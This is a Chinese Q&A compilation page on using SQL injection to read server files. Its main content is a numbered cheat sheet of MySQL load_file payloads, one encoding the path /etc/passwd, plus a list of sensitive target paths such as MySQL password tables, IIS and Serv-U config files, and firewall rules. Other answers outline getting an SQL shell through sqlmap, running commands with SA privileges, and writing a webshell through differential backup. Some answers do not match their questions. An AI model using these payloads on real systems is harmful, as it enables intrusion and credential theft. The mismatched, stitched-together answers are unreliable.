本文目录
如何使用sql注入获取目标文件的信息
就是说在代码中使用字符串常量了,这是一种很原始的方法.比如if(username=="admin"){...}if($_POST=="admin"){...}If Request.Form("username")="admin" Then不知道你用什么语言.随便写了几行.
针对mysql的sql注入,可以使用什么函数来访问系统文件
1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 《 替换成空格 返回的是网页.而无法查看到代码.3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录***隐藏网址******隐藏网址***6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机***隐藏网址***9、C:Program Filesmysqlmy.ini10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上***隐藏网址***15、 /etc/sysconfig/iptables 本看防火墙策略16 、 usr/local/app/php5/lib/php.ini PHP 的相当设置17 、/etc/my.cnf MYSQL的配置文件18、 /etc/redhat-release 红帽子的系统版本19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.21、/usr/local/app/php5/lib/php.ini //PHP相关设置***隐藏网址***23、c:Program FilesRhinoSoft.comServ-UServUDaemon.ini24、c:windowsmy.ini
SQL注入--获取sql-shell
***隐藏网址*** 下面先讲一下思路再说解法: 题目界面:说明admin字段存在注入点(bool、time),且过滤了select,那么怎么注入呢。这里通过sqlmap可以直接获取一个sql shell,直接执行sql语句进行交互。
sql 注入
在动态网页中如果不过滤用户提交上来的恶意数据就会产生注入漏洞,SA权限是mssql数据库才有的,如果是SA权限的注入点可以调用储存扩展直接执行命令,若知道网站路径DB权限下就可以通过差异备份获得webshell 了,若是public 权限就不能向服务器中写入文件
如何通过SQL注入获取服务器本地文件
如何通过SQL注入获取服务器本地文件从服务器上复制下备份文件,在本地还原,应该可以。另外你还可以附加:1。 在服务器上打开数据库管理器,选中数据库在菜单中选择脱机,然后找到服务器上数据库文件,通常是两个一个数据文件一个日志文件。2。 将1中的两个文件复制到本地的某个目录中3。 打开本地数据库管理器 在数据库文件夹上右击显示菜单,选择附加.